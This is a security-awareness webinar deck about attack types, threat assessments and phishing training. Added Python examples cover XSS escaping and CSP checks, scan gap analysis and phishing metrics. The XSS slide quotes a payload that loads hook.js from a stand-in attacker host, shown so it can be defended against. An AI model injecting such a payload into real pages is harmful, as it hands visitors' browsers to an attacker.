Welcome!
System Source Pizza Webinar
Security Awareness
September 26, 2019
Michelle Robinson – Learning Center Director
Email: [email protected]
Agenda
Welcome from Michelle Robinson, System Source Learning Center Director, and Shawn Duffy, President of Duffy Consulting Services, LLC
The importance of cyber security – Why security is still a problem
Types of attacks
Best practices for implementing Cyber Security – Why outsourcing is good practice
Assessment vs. scanning
The important role of the end-user
Q & A
Evaluation @ end of webinar & via email
If it hasn’t arrived by 12:15:
Please double check with your receptionist
Then call / email Mike Jones: [email protected] OR 410-771-5544 x4355
(We are recording the webinar – so don’t think twice about stepping away for a few minutes to go pick it up at your front desk!)
We Hope You
are Enjoying
Your Pizza!!
During the Webinar…
Audio – In presentation mode until end
Control Panel
View webinar in full screen mode
Feel Free to submit written questions
Open Q & A at the end
(please mute when not speaking)
Survey at conclusion of webinar
Shawn Duffy – Principal
Duffy Compliance Services
Duffy Consulting Services (DCS)
Cybersecurity Analysts help prevent attacks through their expertise and knowledge of threats and security controls.
Security controls: safeguards or countermeasures to avoid, detect, counteract, or minimize security risks to physical property, information, computer systems, or other assets.
Take the guesswork out of how to secure your environment
DCS = Cybersecurity Analyst
So why is security still a problem?
What exactly am I buying?
Security is not a component of making money
Security is not mandated – it is often considered overhead
What are the long-term costs?
How much can I afford?
Businesses have a different focus
DCS = Cybersecurity Analyst
So why is security still a problem?
Security is like insurance
What is my risk-to-reward ratio?
Just a little security is fine. It’s not like I am forced to buy it.
DCS = Cybersecurity Analyst
What about Compliance?
Compliance = Driven by “Check the Box”
“Can we just say we do it and figure out how later if we get audited?”
Compliance = the minimum set of security controls required
DCS = Cybersecurity Analyst
“Tried & True” method to secure the environment
Is that enough?
DCS = Cybersecurity Analyst
Types of Attacks
Impersonation
MitM
Session Hijacking
XSS
Privilege Escalation
Backdoors & Rootkits
Ransomware/Phishing
MitM attack
Cross Site Scripting (XSS)
<script src="http://hackerIP:3000/hook.js" type="text/javascript"></script>
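The tag on the slide is the classic XSS payload: the attacker gets a script tag with an external src into a page that other users view, and every victim's browser then loads and runs hook.js from the attacker's host (a hook.js served on port 3000 is the default of the BeEF browser-exploitation framework). The Python below is an added example, not code from the slides or from DCS. It shows the server-side rendering bug that lets the tag through, the output-encoding fix, and a check of whether a Content-Security-Policy would stop the hook from loading even when the injection itself succeeds. The comment-rendering functions, the CSP strings, and the page origin app.example.com are constructed for the example; the CSP matcher is a simplified model of the common source expressions, not a full parser.

```python
import html
from typing import Optional
from urllib.parse import urlsplit

# Constructed untrusted input: the injected tag from the slide, exactly as an
# attacker would submit it in a comment field or profile page.
HOOK_PAYLOAD = '<script src="http://hackerIP:3000/hook.js" type="text/javascript"></script>'


def render_comment_vulnerable(author: str, body: str) -> str:
    """Concatenates user input straight into HTML: the victim's browser parses
    the attacker's <script> tag as markup and fetches hook.js."""
    return f'<div class="comment"><b>{author}</b>: {body}</div>'


def render_comment_escaped(author: str, body: str) -> str:
    """Output encoding for an HTML text context: html.escape turns < > & " '
    into entities, so the payload is displayed as text and never executed."""
    return f'<div class="comment"><b>{html.escape(author)}</b>: {html.escape(body)}</div>'


def _origin(url: str):
    """(scheme, host, port) triple used for source matching."""
    p = urlsplit(url)
    return (p.scheme.lower(), (p.hostname or "").lower(), p.port)


def script_src_allows(csp: Optional[str], page_origin: str, script_url: str) -> bool:
    """Would a browser enforcing `csp` load script_url on a page at page_origin?
    Covers the common script-src source expressions: 'none', 'self', '*',
    scheme sources (https:) and host sources with or without a scheme.
    Keyword sources such as 'unsafe-inline', nonces and hashes do not
    authorise an external src that carries no nonce, so they are skipped.
    Simplified model (no wildcard hosts), not a full CSP implementation."""
    if not csp:
        return True  # no policy at all: any src loads
    directives = {}
    for directive in csp.split(";"):
        tokens = directive.split()
        if tokens:
            directives[tokens[0].lower()] = tokens[1:]
    # script-src governs scripts; default-src is the fallback when it is absent
    sources = directives.get("script-src", directives.get("default-src"))
    if sources is None:
        return True  # nothing governs scripts
    target = _origin(script_url)
    page = _origin(page_origin)
    for src in sources:
        low = src.lower()
        if low == "'none'":
            return False
        if low == "'self'":
            if target == page:
                return True
        elif low == "*":
            if target[0] in ("http", "https"):
                return True
        elif low.startswith("'"):
            continue  # 'unsafe-inline', 'nonce-...', 'sha256-...'
        elif "://" in low:
            if target == _origin(low):
                return True
        elif low.endswith(":"):  # scheme source such as https:
            if target[0] == low[:-1]:
                return True
        else:  # host source without scheme, e.g. cdn.example.com:8443
            allowed = _origin("//" + low)
            if target[1] == allowed[1] and (allowed[2] is None or allowed[2] == target[2]):
                return True
    return False  # no source expression matched: blocked


if __name__ == "__main__":
    page = "https://app.example.com"
    hook = "http://hackerIP:3000/hook.js"
    print(render_comment_vulnerable("guest", HOOK_PAYLOAD))
    print(render_comment_escaped("guest", HOOK_PAYLOAD))
    for policy in (None, "script-src *", "default-src 'self'; script-src 'self' https://cdn.example.com"):
        print(f"CSP {policy!r}: hook loads = {script_src_allows(policy, page, hook)}")
```

The encoding fix is the control that actually removes the vulnerability; the CSP check is the compensating control, and the last policy in the demo shows why a scanner verdict of "XSS found" says little about impact until you know what the environment's policy lets a successful injection do.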
DCS = Cybersecurity Analyst
How do you know you’re secure?
The cheap way:
Buy a scanner
Learn to run scans
Print out huge canned reports
Figure out what’s important
What the client gets using this method:
If outsourced, a hefty bill
CVSS scored results with little to do with your environment
Questions on how to proceed
DCS = Cybersecurity Analyst
Best Practices – Threat Assessments
Subject Matter Expert (SME) way:
Baselines
Information Gathering (including scans)
Data Analysis
Security Controls and Risk Analysis
Customized reporting and presentation
Findings based on the environment
Plan of Action
Building robustness into the environment
Prepares for Penetration Testing
DCS = Cybersecurity Analyst
Best Practices – Assessments
Information Gathering
Infrastructure documentation
Security documentation
Network and host-based logs
Rulesets
Configuration and Configuration Management
Network traffic and metrics
Approved Ports, Protocols, and Services
Vulnerabilities
Web Application information
Wireless information
DCS = Cybersecurity Analyst
Best Practices – Assessments
Review and Analysis
Determines gaps in security controls
Determines impacts to the business
Penetration Testing
System tolerance of real-world attacks
Sophistication of attacker matters
Social Engineering (Phishing, Backdoors)
Password cracking
Wi-Fi access
Tests Countermeasures
Tests Detection and Response capabilities
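A concrete instance of the Baselines, Information Gathering and Review and Analysis steps above: compare the client's approved Ports, Protocols, and Services list against what a scan actually observed, and turn the differences into findings that are about this environment rather than a generic CVSS list. This Python is an added example, not code from the slides or from DCS. The approved baseline, the nmap grepable (-oG) output, and the HIGH_RISK_PORTS set are constructed for the example; the severity labels are the example's own assumption, not a CVSS score.

```python
import re
from collections import defaultdict

# Constructed approved Ports, Protocols and Services baseline: the kind of list
# an assessment gathers from the client's security documentation.
APPROVED_PPS = {
    "10.0.0.5": {(22, "tcp", "ssh"), (443, "tcp", "https")},
    "10.0.0.7": {(443, "tcp", "https")},
}

# Constructed nmap -oG (grepable) output standing in for the scan step.
# Field order per port entry is port/state/protocol/owner/service/rpc/version/.
SCAN_OUTPUT = """\
# Nmap 7.80 scan initiated (constructed sample)
Host: 10.0.0.5 (web01)	Ports: 22/open/tcp//ssh//OpenSSH 7.4/, 443/open/tcp//https//nginx/, 445/open/tcp//microsoft-ds///
Host: 10.0.0.7 (web02)	Ports: 80/open/tcp//http//nginx/, 443/filtered/tcp//https///
Host: 10.0.0.9 ()	Ports: 3389/open/tcp//ms-wbt-server///
# Nmap done
"""

# Example assumption: remote-access services that an attacker probes first.
HIGH_RISK_PORTS = {23, 445, 3389}


def parse_grepable(text):
    """Return {host: {(port, proto, service)}} containing open ports only."""
    observed = defaultdict(set)
    for line in text.splitlines():
        m = re.match(r"Host: (\S+) .*?Ports: (.*)", line)
        if not m:
            continue  # comment lines and hosts with no port section
        host, ports = m.group(1), m.group(2)
        for entry in ports.split(", "):
            fields = entry.split("/")
            port, state, proto, service = int(fields[0]), fields[1], fields[2], fields[4]
            if state == "open":
                observed[host].add((port, proto, service))
    return dict(observed)


def gap_analysis(baseline, observed):
    """Compare observed open services with the approved list.
    Returns (severity, host, 'port/proto' or None, message) tuples."""
    findings = []
    for host in sorted(set(baseline) | set(observed)):
        approved = baseline.get(host)
        seen = observed.get(host, set())
        if approved is None:
            open_list = ", ".join(f"{p}/{pr} {s}" for p, pr, s in sorted(seen))
            findings.append(("high", host, None,
                             f"host not in approved inventory (unknown asset); open: {open_list}"))
            continue
        for port, proto, service in sorted(seen - approved):
            sev = "high" if port in HIGH_RISK_PORTS else "medium"
            findings.append((sev, host, f"{port}/{proto}",
                             f"open {service} is not in the approved PPS list"))
        for port, proto, service in sorted(approved - seen):
            findings.append(("info", host, f"{port}/{proto}",
                             f"approved {service} not observed open (down, firewalled, or stale baseline)"))
    return findings


def report(findings):
    """One line per finding, highest severity first, for the plan of action."""
    order = {"high": 0, "medium": 1, "info": 2}
    return [f"[{sev.upper()}] {host} {port or '-'}: {msg}"
            for sev, host, port, msg in sorted(findings, key=lambda f: order[f[0]])]


if __name__ == "__main__":
    for line in report(gap_analysis(APPROVED_PPS, parse_grepable(SCAN_OUTPUT))):
        print(line)
```

The "info" findings matter as much as the "high" ones during review: an approved service that is not visible either means the baseline documentation is stale or that a control (host firewall, ruleset) is filtering it, and either way the analyst has something to confirm with the client before the plan of action is written.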
DCS = Cybersecurity Analyst
Best Practices – Assessments
Reporting
Findings
Supporting Documentation
Recommendations
Briefings and Presentations
Remediation
Plan of Action
Metrics to measure results
Roles & Responsibilities
Re-evaluations
DCS = Cybersecurity Analyst
Best Practices – Assessments
What the client gets using this method:
Cost effective solution with progress milestones
Preparation for Pen Testing against the system
Answers on how to proceed
Results that are specific to your environment
Technical Support on conducting remediation
Re-evaluations confirming remediation tasks
Metrics to track security progress
Duffy Compliance Services
Security Compliance Services
NIST-based such as DFARS CUI, HIPAA, FISMA
E.U. GDPR and U.S. State Privacy Acts (NYDFS & CCPA)
Security Policy and Procedure Development
Threat Management
Network Assessments
Web Application Assessments
Wireless Assessments
Continuous Monitoring
Security Awareness Training
Michelle Robinson – Learning Center Director
System Source
System Source and KnowBe4
Partnering to deliver high quality training and phishing tests
About KnowBe4
• World’s most popular Security Awareness Training and Simulated Phishing platform
• Training based on Kevin Mitnick’s 30+ years’ experience (The Dark Side Hacker)
Gartner peer insights puts KnowBe4 at the top of the list for overall rating including:
• Product capabilities
• Customer experience
• Willingness to recommend
We’ve helped 5,103 customers use KnowBe4!
KnowBe4 Recognized by Gartner as a Leader – 3 Years in a Row
Magic Quadrant for Security Awareness Computer-Based Training 2019
Why We Phish and Train
A staggering 91% of successful data breaches start with a spear phishing attack
Users Are the Last Line of Defense
• 91% of successful data breaches start with a spear phishing attack
• 30% of data breaches are caused by repeat offenders from within the organization
Why We Phish and Train
2019 Verizon Report Findings
There is good news!
Phish breach rates are going down.
Why?
2019 Verizon Report Findings
Top Breaches:
Phishing - #1
Use of Stolen Credentials
Backdoors or C2 (Command and Control)
Top Hacking Techniques:
Email is the #1 delivery method
Office Document is the #1 file type
Phishing is the #1 technique
Human is the #1 target
CEO Fraud
Phishing Test Click Rate by Industry
Our Approach
Baseline Testing
We provide baseline testing to assess the Phish-prone percentage of your users through a free simulated phishing attack.
Train Your Users
The world's largest library of security awareness training content, including interactive modules, videos, games, posters and newsletters. Automated training campaigns with scheduled reminder emails.
Phish Your Users
Best-in-class, fully automated simulated phishing attacks, hundreds of templates with unlimited usage, and community phishing templates.
See The Results
Enterprise-strength reporting, showing stats and graphs for both training and phishing, ready for management. Show the great ROI!
Baseline Testing
4 templates for your free baseline phishing test
O365
Exchange
Gsuite
Network password
KnowBe4 Training Modules
Silver – Basic training modules, simulated testing, reporting
Gold – Silver, plus intermediate training content, Email Exposure Check (EEC) reports, vishing tests
Platinum – Silver, Gold, advanced phishing features; Smart Groups, Reporting APIs, security roles, Social Engineering Indicator landing pages
Diamond – Silver, Gold, Platinum, advanced training content; full access to 700+ items including interactive modules, videos, games, posters and newsletters.
World’s Largest Library of Security Training Content In 4 Libraries
Most Common Phishing Lures
Sample Phishing Tests
2019 Phishing By Industry Benchmarking Study
KnowBe4 analyzed data from nearly nine million users across 18,000 organizations with over 20 million simulated phishing security tests across nineteen different industries.
2019 Phishing By Industry Benchmarking Study
Results after 90 Days
Results after training and phishing for 1 year
Reporting
[Chart: Training Impact on Phish Prone Staff (52 person sample). Y-axis: Phish Prone %, 0% to 30%. Series: training implemented for those failing; new hires without training.]
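How the numbers behind a chart like this are produced, as an added Python example that is not from the slides or from KnowBe4: a constructed campaign log (one row per recipient per simulated phish, recording whether the user had completed training before that campaign and whether they clicked, reported or ignored the message) is rolled up into the Phish-prone percentage per campaign for trained versus untrained users, the report rate, the repeat clickers the slides call repeat offenders, and the list of untrained clickers to enrol next. The campaign names, users and outcomes are constructed for the example.

```python
from collections import Counter, defaultdict

# Constructed simulated-phishing log: (campaign, user, trained_before_campaign, action).
# action is "clicked", "reported" (used the phish alert button) or "ignored".
EVENTS = [
    ("2019-01 baseline", "alice", False, "clicked"),
    ("2019-01 baseline", "bob", False, "ignored"),
    ("2019-01 baseline", "carol", False, "clicked"),
    ("2019-01 baseline", "dave", False, "reported"),
    ("2019-01 baseline", "erin", False, "clicked"),
    ("2019-01 baseline", "frank", False, "ignored"),
    # 90 days later: the three baseline clickers have completed training
    ("2019-04 day-90", "alice", True, "ignored"),
    ("2019-04 day-90", "bob", False, "ignored"),
    ("2019-04 day-90", "carol", True, "clicked"),
    ("2019-04 day-90", "dave", False, "reported"),
    ("2019-04 day-90", "erin", True, "reported"),
    ("2019-04 day-90", "frank", False, "clicked"),
    # one year: frank was trained after clicking; gina is a new hire, not yet trained
    ("2020-01 one-year", "alice", True, "reported"),
    ("2020-01 one-year", "bob", False, "ignored"),
    ("2020-01 one-year", "carol", True, "clicked"),
    ("2020-01 one-year", "dave", False, "reported"),
    ("2020-01 one-year", "erin", True, "reported"),
    ("2020-01 one-year", "frank", True, "ignored"),
    ("2020-01 one-year", "gina", False, "clicked"),
]


def campaign_stats(events, campaign):
    """Phish-prone % (clicked / sent) and report % for one campaign, overall
    and split into users trained before the campaign vs not yet trained."""
    buckets = defaultdict(lambda: {"sent": 0, "clicked": 0, "reported": 0})
    for camp, _user, trained, action in events:
        if camp != campaign:
            continue
        for key in ("all", "trained" if trained else "untrained"):
            b = buckets[key]
            b["sent"] += 1
            if action in ("clicked", "reported"):
                b[action] += 1
    return {
        key: {**b,
              "phish_prone_pct": round(100 * b["clicked"] / b["sent"], 1),
              "report_pct": round(100 * b["reported"] / b["sent"], 1)}
        for key, b in buckets.items()
    }


def repeat_clickers(events, min_clicks=2):
    """Users who clicked in at least min_clicks campaigns: the repeat offenders
    who need more than the standard training module."""
    clicks = Counter(user for _c, user, _t, action in events if action == "clicked")
    return sorted(user for user, n in clicks.items() if n >= min_clicks)


def training_queue(events, campaign):
    """Untrained users who clicked in this campaign: enrol these first."""
    return sorted(user for camp, user, trained, action in events
                  if camp == campaign and action == "clicked" and not trained)


def trend(events):
    """Overall phish-prone % per campaign in log order: the series for the chart."""
    order = list(dict.fromkeys(camp for camp, *_ in events))
    return [(camp, campaign_stats(events, camp)["all"]["phish_prone_pct"]) for camp in order]


if __name__ == "__main__":
    for camp, pct in trend(EVENTS):
        stats = campaign_stats(EVENTS, camp)
        print(f"{camp}: phish-prone {pct}% overall, "
              f"trained {stats.get('trained', {}).get('phish_prone_pct', 'n/a')}%, "
              f"untrained {stats.get('untrained', {}).get('phish_prone_pct', 'n/a')}%")
    print("repeat clickers:", repeat_clickers(EVENTS))
    print("enrol next:", training_queue(EVENTS, "2020-01 one-year"))
```

Tracking the report rate alongside the click rate matters: a campaign where clicks fall but nobody reports still leaves the help desk blind to a real phish, and a rising report rate is the signal that the Phish Alert style of control is actually being used.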
Value Proposition: Risk and Operational Expenses
RISK
• Reduced malware infections
• Reduced data loss
• Reduced potential cyber-theft
• Users have security top of mind
OPEX
• Reduced help desk calls
• Reduced cleaning and re-imaging of machines
• Reduced downtime, increased user productivity
• Real ROI: Forrester's Total Economic Impact™ on KnowBe4 reports a 127% ROI with a one-month payback
“Social Engineering is information security’s weakest link.”
– Kevin Mitnick, ‘The World’s Most Famous Hacker’, IT Security Consultant
Subscription Levels and Pricing
Silver Level
Admin Management Console
Unlimited Phishing Security Tests
Automated Security Awareness Program
Training Access Level I
Automated Training Campaigns
Crypto-Ransom Guarantee
Phish Alert Button
Active Directory Integration
Phishing Reply Tracking
Security ‘Hints & Tips’
Gold Level
Training Access Level II
Monthly Email Exposure Check
Vishing Security Test (voice mail)
Platinum Level
“Automated Human Pentesting”
USB Drive Test
Vulnerable Browser Plugin Detection
Priority Level Support
Social Engineering Indicators
Diamond Level
Training Access Level III
AIDA – Artificial Intelligence-driven Agent (AI Agent) BETA
Seats (Per Year)   Corporate        Education/Non-Profit
25-50              $17.00-$29.50    $15.30-$26.55
51-100             $15.00-$26.50    $13.50-$23.85
101-500            $11.00-$20.50    $9.90-$18.45
501-1000           $10.00-$19.00    $9.00-$17.10
Optional Setup Fee for steps 1-5 is $20/person to a maximum of $1,000
Thank you!
Q&A
Please “Type in your question” & we will read your question and answer ☺